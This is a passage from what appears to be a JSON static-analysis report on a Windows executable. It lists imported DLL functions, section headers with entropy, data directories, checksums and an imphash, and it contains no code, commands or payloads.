  1386. "dll": "KERNEL32.dll"
  1387. },
  1388. {
  1389. "imports": [
  1390. {
  1391. "name": "DestroyWindow",
  1392. "address": "0x41d058"
  1393. },
  1394. {
  1395. "name": "RegisterClassW",
  1396. "address": "0x41d05c"
  1397. },
  1398. {
  1399. "name": "LoadIconA",
  1400. "address": "0x41d060"
  1401. },
  1402. {
  1403. "name": "SetWindowLongW",
  1404. "address": "0x41d064"
  1405. },
  1406. {
  1407. "name": "SetWindowTextW",
  1408. "address": "0x41d068"
  1409. },
  1410. {
  1411. "name": "DefWindowProcW",
  1412. "address": "0x41d06c"
  1413. },
  1414. {
  1415. "name": "CreateWindowExA",
  1416. "address": "0x41d070"
  1417. },
  1418. {
  1419. "name": "DestroyIcon",
  1420. "address": "0x41d074"
  1421. },
  1422. {
  1423. "name": "SendMessageW",
  1424. "address": "0x41d078"
  1425. },
  1426. {
  1427. "name": "CreateWindowExW",
  1428. "address": "0x41d07c"
  1429. },
  1430. {
  1431. "name": "UnregisterClassA",
  1432. "address": "0x41d080"
  1433. },
  1434. {
  1435. "name": "LoadStringW",
  1436. "address": "0x41d084"
  1437. },
  1438. {
  1439. "name": "PostMessageW",
  1440. "address": "0x41d088"
  1441. }
  1442. ],
  1443. "dll": "USER32.dll"
  1444. },
  1445. {
  1446. "imports": [
  1447. {
  1448. "name": "CreateDIBSection",
  1449. "address": "0x41d000"
  1450. },
  1451. {
  1452. "name": "CreateBitmap",
  1453. "address": "0x41d004"
  1454. }
  1455. ],
  1456. "dll": "GDI32.dll"
  1457. },
  1458. {
  1459. "imports": [
  1460. {
  1461. "name": "CoInitialize",
  1462. "address": "0x41d0d8"
  1463. },
  1464. {
  1465. "name": "CoGetObject",
  1466. "address": "0x41d0dc"
  1467. }
  1468. ],
  1469. "dll": "ole32.dll"
  1470. },
  1471. {
  1472. "imports": [
  1473. {
  1474. "name": "__setusermatherr",
  1475. "address": "0x41d090"
  1476. },
  1477. {
  1478. "name": "_c_exit",
  1479. "address": "0x41d094"
  1480. },
  1481. {
  1482. "name": "_except_handler3",
  1483. "address": "0x41d098"
  1484. },
  1485. {
  1486. "name": "_XcptFilter",
  1487. "address": "0x41d09c"
  1488. },
  1489. {
  1490. "name": "_cexit",
  1491. "address": "0x41d0a0"
  1492. },
  1493. {
  1494. "name": "exit",
  1495. "address": "0x41d0a4"
  1496. },
  1497. {
  1498. "name": "_wcmdln",
  1499. "address": "0x41d0a8"
  1500. },
  1501. {
  1502. "name": "__wgetmainargs",
  1503. "address": "0x41d0ac"
  1504. },
  1505. {
  1506. "name": "_initterm",
  1507. "address": "0x41d0b0"
  1508. },
  1509. {
  1510. "name": "_exit",
  1511. "address": "0x41d0b4"
  1512. },
  1513. {
  1514. "name": "_adjust_fdiv",
  1515. "address": "0x41d0b8"
  1516. },
  1517. {
  1518. "name": "__p__commode",
  1519. "address": "0x41d0bc"
  1520. },
  1521. {
  1522. "name": "__p__fmode",
  1523. "address": "0x41d0c0"
  1524. },
  1525. {
  1526. "name": "__set_app_type",
  1527. "address": "0x41d0c4"
  1528. },
  1529. {
  1530. "name": "_controlfp",
  1531. "address": "0x41d0c8"
  1532. },
  1533. {
  1534. "name": "__dllonexit",
  1535. "address": "0x41d0cc"
  1536. },
  1537. {
  1538. "name": "_onexit",
  1539. "address": "0x41d0d0"
  1540. }
  1541. ],
  1542. "dll": "msvcrt.dll"
  1543. }
  1544. ],
  1545. "digital_signers": null,
  1546. "exported_dll_name": null,
  1547. "actual_checksum": "0x0001d0b3",
  1548. "overlay": {
  1549. "size": "0x00001f08",
  1550. "offset": "0x0000c000"
  1551. },
  1552. "imagebase": "0x00400000",
  1553. "reported_checksum": "0x0001d0b3",
  1554. "icon_hash": null,
  1555. "entrypoint": "0x00404636",
  1556. "timestamp": "2016-08-19 14:55:52",
  1557. "osversion": "4.0",
  1558. "sections": [
  1559. {
  1560. "name": ".text",
  1561. "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  1562. "virtual_address": "0x00001000",
  1563. "size_of_data": "0x00004000",
  1564. "entropy": "5.74",
  1565. "raw_address": "0x00001000",
  1566. "virtual_size": "0x00003916",
  1567. "characteristics_raw": "0xf0000020"
  1568. },
  1569. {
  1570. "name": ".bss",
  1571. "characteristics": "IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  1572. "virtual_address": "0x00005000",
  1573. "size_of_data": "0x00000000",
  1574. "entropy": "0.00",
  1575. "raw_address": "0x00000000",
  1576. "virtual_size": "0x00017030",
  1577. "characteristics_raw": "0xc0000080"
  1578. },
  1579. {
  1580. "name": ".rdata",
  1581. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
  1582. "virtual_address": "0x0001d000",
  1583. "size_of_data": "0x00001000",
  1584. "entropy": "2.45",
  1585. "raw_address": "0x00005000",
  1586. "virtual_size": "0x000005dc",
  1587. "characteristics_raw": "0x40000040"
  1588. },
  1589. {
  1590. "name": ".data",
  1591. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  1592. "virtual_address": "0x0001e000",
  1593. "size_of_data": "0x00005000",
  1594. "entropy": "6.48",
  1595. "raw_address": "0x00006000",
  1596. "virtual_size": "0x00004ef4",
  1597. "characteristics_raw": "0xd0000040"
  1598. },
  1599. {
  1600. "name": ".reloc",
  1601. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
  1602. "virtual_address": "0x00023000",
  1603. "size_of_data": "0x00001000",
  1604. "entropy": "0.70",
  1605. "raw_address": "0x0000b000",
  1606. "virtual_size": "0x0000024e",
  1607. "characteristics_raw": "0x42000040"
  1608. }
  1609. ],
  1610. "resources": [],
  1611. "dirents": [
  1612. {
  1613. "virtual_address": "0x00000000",
  1614. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
  1615. "size": "0x00000000"
  1616. },
  1617. {
  1618. "virtual_address": "0x0001d104",
  1619. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
  1620. "size": "0x00000078"
  1621. },
  1622. {
  1623. "virtual_address": "0x00000000",
  1624. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
  1625. "size": "0x00000000"
  1626. },
  1627. {
  1628. "virtual_address": "0x00000000",
  1629. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
  1630. "size": "0x00000000"
  1631. },
  1632. {
  1633. "virtual_address": "0x0000c000",
  1634. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
  1635. "size": "0x00001f08"
  1636. },
  1637. {
  1638. "virtual_address": "0x00023000",
  1639. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
  1640. "size": "0x0000011c"
  1641. },
  1642. {
  1643. "virtual_address": "0x00000000",
  1644. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
  1645. "size": "0x00000000"
  1646. },
  1647. {
  1648. "virtual_address": "0x00000000",
  1649. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
  1650. "size": "0x00000000"
  1651. },
  1652. {
  1653. "virtual_address": "0x00000000",
  1654. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
  1655. "size": "0x00000000"
  1656. },
  1657. {
  1658. "virtual_address": "0x00000000",
  1659. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
  1660. "size": "0x00000000"
  1661. },
  1662. {
  1663. "virtual_address": "0x00000000",
  1664. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
  1665. "size": "0x00000000"
  1666. },
  1667. {
  1668. "virtual_address": "0x00000000",
  1669. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
  1670. "size": "0x00000000"
  1671. },
  1672. {
  1673. "virtual_address": "0x0001d000",
  1674. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
  1675. "size": "0x000000e4"
  1676. },
  1677. {
  1678. "virtual_address": "0x00000000",
  1679. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
  1680. "size": "0x00000000"
  1681. },
  1682. {
  1683. "virtual_address": "0x00000000",
  1684. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
  1685. "size": "0x00000000"
  1686. },
  1687. {
  1688. "virtual_address": "0x00000000",
  1689. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
  1690. "size": "0x00000000"
  1691. }
  1692. ],
  1693. "exports": [],
  1694. "guest_signers": {},
  1695. "imphash": "ed3432959df410bdf8d52780a8c0d1d3",
  1696. "icon_fuzzy": null,
  1697. "icon": null,
  1698. "pdbpath": null,
  1699. "imported_dll_count": 5,
  1700. "versioninfo": []
  1701. }
  1702. }